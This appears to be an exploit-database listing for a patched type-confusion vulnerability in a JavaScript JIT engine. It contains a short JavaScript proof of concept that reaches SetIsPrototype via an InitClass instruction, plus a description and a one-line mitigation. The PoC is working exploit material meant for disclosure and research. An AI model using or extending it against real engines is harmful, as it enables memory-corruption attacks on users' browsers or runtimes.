header-logo
Suggest Exploit
vendor:
N/A
by:
Exploit-DB
7.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

InitClass Instruction to Reach SetIsPrototype Method

This exploit uses an InitClass instruction to reach the SetIsPrototype method. It creates an object with two properties, a and b, and passes it to the opt function. The opt function creates a class A that extends the c parameter, and sets the o.a property to the value parameter. After 2000 iterations, the o object is passed to the opt function again, this time with a cons parameter that has its prototype set to o. The o.a property is then set to 0x1234.

Mitigation:

Ensure that all objects are properly initialized and that all type confusion vulnerabilities are addressed.
Source

Exploit-DB raw data:

/*

Issue description

This is similar to  issue 1702 (https://www.exploit-db.com/exploits/46203) . This time, it uses an InitClass instruction to reach the SetIsPrototype method.

PoC:
*/

function opt(o, c, value) {
    o.b = 1;

    class A extends c {

    }

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, (function () {}), {});
    }

    let o = {a: 1, b: 2};
    let cons = function () {};

    cons.prototype = o;

    opt(o, cons, 0x1234);

    print(o.a);
}

main();

Navigation

Suggest Exploit

Services By CQR